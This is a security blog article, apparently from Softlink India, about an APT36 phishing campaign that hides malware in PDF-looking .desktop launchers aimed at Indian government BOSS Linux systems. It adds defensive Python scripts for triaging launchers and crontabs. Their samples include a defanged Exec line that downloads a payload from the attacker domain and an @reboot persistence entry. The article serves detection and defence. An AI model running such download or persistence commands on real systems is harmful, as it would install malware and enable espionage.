Introduction
Cybersecurity threats against national infrastructure are becoming increasingly sophisticated. Recently, researchers revealed that Indian government systems are under attack: hackers deploy fake shortcut files disguised as PDF documents to deliver malware. This campaign, attributed to Pakistan-linked hacking group Transparent Tribe (APT36), has raised fresh concerns about data security, espionage, and long-term surveillance of critical Indian institutions.
The alarming discovery, made by cybersecurity firm CYFIRMA, highlights how attackers are evolving from traditional Windows-based threats to also target India’s indigenous Linux-based systems like BOSS (Bharat Operating System Solutions). As Softlink India emphasizes, such incidents prove that protecting sensitive data is no longer optional—it’s a national security imperative.
How the Attack Works
According to CYFIRMA’s report, the campaign begins with phishing emails that appear to contain official meeting invitations. Victims receive a file named something like “Meeting_Ltr_ID1543ops.pdf.desktop”. While the file looks like a harmless PDF, it is actually a malicious shortcut file (.desktop) designed to install spyware.
Step-by-step breakdown:
- Delivery through phishing – The fake document arrives in an email that appears legitimate.
- Execution of malicious file – Clicking the attachment runs the shortcut instead of opening a PDF.
- Malware installation – The shortcut silently downloads payloads from attacker-controlled servers such as securestore[.]cv and modgovindia[.]space.
- Decoy distraction – To avoid suspicion, a real PDF hosted on Google Drive opens in Firefox, tricking the victim into thinking they opened a meeting document.
- Persistence – On Linux BOSS, the malware sets up a cron job to execute a hidden payload (.config/systemd/systemd-update) every time the system reboots.
- Espionage – Once installed, the malware steals sensitive files, harvests credentials, and provides long-term remote access.
This makes the attack extremely dangerous, as it blends social engineering, stealthy payloads, and persistent backdoors to infiltrate government networks.
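The lure described above can be triaged mechanically: a .desktop launcher is an INI-style text file whose Exec key says what actually runs when the icon is clicked. The following added example (not code from CYFIRMA, Softlink India or the campaign itself) parses the [Desktop Entry] group and flags the traits the article reports: a document-looking name ending in .desktop, an Exec line that spawns a shell and fetches something from the network, a decoy document opened in a browser, and a PDF icon attached to something that is not a PDF viewer. The launcher text, the defanged (hxxp, [.]) URLs and the placeholder paths are constructed for the demo; the viewer list and heuristics are assumptions a practitioner would tune for their environment.

```python
"""Heuristic triage of a .desktop launcher that poses as a PDF.

Added example for this article; it is not CYFIRMA's, Softlink India's or
APT36's code. The launcher text and the defanged (hxxp, [.]) URLs below are
constructed for the demo, shaped like the lure the article describes.
"""
import re
import shlex
from configparser import ConfigParser
from typing import Dict, List

# Commands that fetch content from the network (substring match on Exec).
DOWNLOADERS = ("curl", "wget")
# Interpreters that run an inline script when given -c.
SHELLS = ("bash", "sh", "dash", "zsh")
# Common Linux PDF viewers (assumed list); a PDF icon with none of these in Exec is odd.
PDF_VIEWERS = ("evince", "okular", "xreader", "atril")
DOCUMENT_SUFFIX = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$")
REMOTE_URL = re.compile(r"\b(?:https?|hxxps?)://")


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [Desktop Entry] group (empty if absent).

    .desktop files are INI-like, so ConfigParser suffices for triage; interpolation
    is off because Exec values legitimately contain % field codes such as %U.
    """
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case: Exec, Name, Icon ...
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp.items("Desktop Entry"))


def triage(filename: str, text: str) -> List[str]:
    """Return findings for one launcher; an empty list means nothing was flagged."""
    entry = parse_desktop_entry(text)
    if not entry:
        return ["no [Desktop Entry] group: not a launcher at all"]
    findings: List[str] = []
    if DOCUMENT_SUFFIX.search(filename.lower()):
        findings.append("double extension: document-looking name ends in .desktop")
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = exec_line.split()
    if argv and argv[0].rsplit("/", 1)[-1] in SHELLS and "-c" in argv:
        findings.append("Exec spawns a shell with -c (inline script)")
    if any(tool in exec_line for tool in DOWNLOADERS):
        findings.append("Exec fetches content from the network")
    if REMOTE_URL.search(exec_line) and ("firefox" in exec_line or "xdg-open" in exec_line):
        findings.append("Exec opens a remote document in a browser (possible decoy)")
    icon = entry.get("Icon", "").lower()
    if icon.endswith("pdf") and not any(v in exec_line for v in PDF_VIEWERS):
        findings.append("PDF icon but Exec is not a PDF viewer")
    return findings


# Constructed sample: the filename is the one reported in the article; the
# Exec line mimics the described behaviour (fetch a payload, open a decoy in
# Firefox) with defanged URLs and placeholder paths.
LURE_NAME = "Meeting_Ltr_ID1543ops.pdf.desktop"
LURE_TEXT = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "wget -q -O /tmp/.stage hxxp://securestore[.]cv/PLACEHOLDER; firefox hxxps://drive.google.com/PLACEHOLDER"
"""

# Constructed benign launcher for comparison.
VIEWER_NAME = "org.gnome.Evince.desktop"
VIEWER_TEXT = """[Desktop Entry]
Type=Application
Name=Document Viewer
Icon=org.gnome.Evince
Exec=evince %U
"""

if __name__ == "__main__":
    for name, text in ((LURE_NAME, LURE_TEXT), (VIEWER_NAME, VIEWER_TEXT)):
        print(name, "->", triage(name, text) or ["clean"])
```

Run against a mail gateway quarantine or a user's Downloads directory, the same function gives a mail filter or EDR rule a cheap first pass: a genuine PDF never needs a launcher, so any attachment whose name ends in .pdf.desktop is already worth blocking before the heuristics on Exec are even consulted.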
Why Indian Government Systems Are the Target
The fact that Indian government systems are under attack with fake shortcut files is no coincidence. Transparent Tribe has long been associated with targeting Indian defense, government, and critical infrastructure.
Indian agencies store:
- Defense and strategic data including procurement records and military communications.
- Citizen information such as Aadhaar details, tax filings, and personal records.
- Financial and policy documents related to budgets and economic planning.
- Infrastructure blueprints including energy, transportation, and communication systems.
By compromising such assets, attackers gain not only espionage benefits but also long-term geopolitical leverage.
Evolution of Transparent Tribe (APT36)
Transparent Tribe has been active for over a decade. Earlier, their campaigns mostly relied on Windows-based malware and phishing lures. However, this latest operation shows a significant tactical shift:
- Moving from only Windows to also targeting Linux BOSS OS, a government-backed system widely deployed in Indian departments.
- Using weaponized .desktop files, a new delivery method rarely seen in earlier attacks.
- Combining malware with credential-harvesting websites that mimic Indian government portals, even bypassing Kavach 2FA (used since 2022).
This adaptability makes APT36 particularly dangerous. They are no longer limited to one platform but aim to exploit multiple attack vectors—Windows, Linux, and even mobile devices.
Real-World Impact of the Campaign
The discovery that Indian government systems are under attack through fake shortcut files signals several potential consequences:
- Data Theft – Classified government documents and strategic information could be stolen and misused.
- Long-Term Espionage – By maintaining persistence, attackers can monitor operations for months without being detected.
- Reputation Damage – Breaches undermine public trust in digital governance initiatives.
- Operational Disruption – Malware infections can slow down or disable essential services.
For Softlink India, which advocates stronger cybersecurity practices, this campaign demonstrates the importance of building resilient IT infrastructures.
Why Target BOSS Linux?
One of the most striking details of this campaign is the focus on BOSS Linux, India’s indigenous operating system. Since BOSS is widely adopted in government departments for security reasons, targeting it gives attackers direct access to sensitive systems.
The malware achieves persistence by adding a cron job that reloads the hidden payload after every reboot. This ensures continuous access and makes detection harder, especially in organizations not trained to identify Linux-based threats.
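The persistence mechanism described here leaves a concrete artifact a defender can look for: a crontab entry, typically scheduled with @reboot, that points at an executable hidden in a dot-directory under the user's home and named to resemble systemd. Genuine systemd user units live under ~/.config/systemd/user/ and systemd never executes an arbitrary binary placed directly in ~/.config/systemd/, so a file like .config/systemd/systemd-update is borrowing the name, not the mechanism. The following added example (not CYFIRMA's or Softlink India's code) scans crontab text, as `crontab -l` prints it, and reports entries that run at boot, reference a hidden path, or invoke something called "systemd" from outside the directories where systemd actually lives. The crontab lines are constructed; the payload path is the one the article reports, and the directory list is an assumption for the demo.

```python
"""Scan crontab text for reboot-time persistence pointing at hidden payloads.

Added example for this article; it is not CYFIRMA's or Softlink India's code.
The crontab lines below are constructed; the payload path is the one the
article reports (.config/systemd/systemd-update).
"""
import re
from typing import List, Tuple

# Directories where systemd legitimately keeps units (assumed list). Anything
# calling itself "systemd" from elsewhere, e.g. a home directory, deserves a look.
SYSTEMD_DIRS = ("/etc/systemd/", "/lib/systemd/", "/usr/lib/systemd/", "/usr/local/lib/systemd/")
ENV_ASSIGNMENT = re.compile(r"^\w+=")          # SHELL=/bin/sh, PATH=..., MAILTO=...
HIDDEN_COMPONENT = re.compile(r"(^|/)\.[^/]")  # a path component starting with '.'


def split_cron_line(line: str) -> Tuple[str, str]:
    """Split one crontab entry into (schedule, command)."""
    if line.startswith("@"):  # @reboot, @daily, ... carry a single schedule token
        parts = line.split(None, 1)
        return parts[0], parts[1] if len(parts) > 1 else ""
    fields = line.split(None, 5)  # five time fields, then the command
    if len(fields) < 6:
        return line, ""
    return " ".join(fields[:5]), fields[5]


def flag_command(schedule: str, command: str) -> List[str]:
    """Return reasons why this entry looks like persistence for a hidden payload."""
    reasons: List[str] = []
    if schedule == "@reboot":
        reasons.append("runs at every boot (@reboot)")
    for token in command.split():
        if HIDDEN_COMPONENT.search(token):
            reasons.append(f"references a hidden path: {token}")
            break
    if "systemd" in command and not any(d in command for d in SYSTEMD_DIRS):
        reasons.append("'systemd' in the name but not under a systemd directory")
    return reasons


def scan_crontab(text: str) -> List[Tuple[str, List[str]]]:
    """Return (line, reasons) for every entry that raised at least one reason."""
    hits: List[Tuple[str, List[str]]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue  # blank, comment or environment assignment
        schedule, command = split_cron_line(line)
        reasons = flag_command(schedule, command)
        if reasons:
            hits.append((line, reasons))
    return hits


# Constructed sample crontab (as `crontab -l` would print it for one user).
SAMPLE_CRONTAB = """# m h dom mon dow command
SHELL=/bin/bash
@reboot /home/user/.config/systemd/systemd-update
0 2 * * * /usr/local/bin/backup.sh --quiet
30 6 * * 1 /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for line, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(line)
        for reason in reasons:
            print("   -", reason)
```

On a BOSS host the same scan should be run over every user's crontab and over /etc/cron.d, since the article only states that the payload is re-run at reboot, not which user's crontab carries it; an entry that trips all three reasons at once, as the sample line does, is a strong candidate for the persistence the report describes.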
This marks a major strategic evolution, as hackers are no longer only exploiting global software platforms but also tailoring attacks to indigenous technologies.
Recommendations & Mitigation
Since Indian government systems are under attack with fake shortcut files, experts recommend immediate action. Softlink India suggests:
- Strong Email Security – Deploy gateways that filter suspicious attachments.
- Regular Cybersecurity Training – Educate government staff about phishing and disguised file formats.
- Least-Privilege Controls – Harden Linux BOSS by limiting user permissions.
- Endpoint Detection & Response (EDR) – Detect anomalies in file execution and system processes.
- IOC/YARA Integration – Update systems with threat intelligence indicators to catch malware early.
- Patch Management – Apply timely updates to fix vulnerabilities.
- Multi-Factor Authentication Monitoring – Ensure that 2FA solutions like Kavach cannot be bypassed by fake portals.
The Bigger Picture
This incident highlights the growing national security risks posed by APT groups. If successful, such attacks could lead to:
- Theft of classified defense and diplomatic information
- Disruption of critical government operations
- Long-term surveillance and monitoring of Indian agencies
As APT36 continues to refine its methods, India faces the challenge of defending against multi-platform cyber-espionage campaigns that exploit both human error and technical weaknesses.
Conclusion
The revelation that Indian government systems are under attack with fake shortcut files disguised as PDFs is a stark reminder of how creative and persistent nation-linked hacking groups have become. By shifting to Linux BOSS and using fake portals to harvest credentials, Transparent Tribe has shown its ability to adapt and remain a long-term threat.
Government agencies must invest in advanced defenses, employee training, and proactive monitoring to prevent future breaches. Cybersecurity is no longer just about installing antivirus—it’s about building resilience against sophisticated campaigns.
As Softlink India stresses, safeguarding national data requires vigilance, awareness, and continuous adaptation. The threat may evolve, but with the right defenses in place, India can protect its government systems from the growing tide of cyber-espionage.
FAQs
1. How are Indian government systems under attack with fake shortcut files?
Hackers are sending phishing emails with malicious .desktop files disguised as PDFs. When opened, they install malware in the background, targeting Indian government systems.
2. What is the role of Transparent Tribe (APT36) in these attacks?
Transparent Tribe, a Pakistan-linked hacking group, is behind the campaign. They use fake shortcut files to compromise both Windows and Linux BOSS systems in India.
3. Why is Linux BOSS targeted in this cyberattack?
BOSS is widely used in Indian government departments. By deploying weaponized .desktop files, attackers gain persistence and long-term access to critical systems.
4. What risks arise when hackers deploy fake shortcut files?
These attacks can lead to data theft, espionage, disruption of services, and unauthorized access to sensitive Indian government information.
5. How can Softlink India help prevent such attacks?
Softlink India emphasizes proactive security measures like user training, email filtering, endpoint detection, and BOSS hardening to defend against shortcut file malware.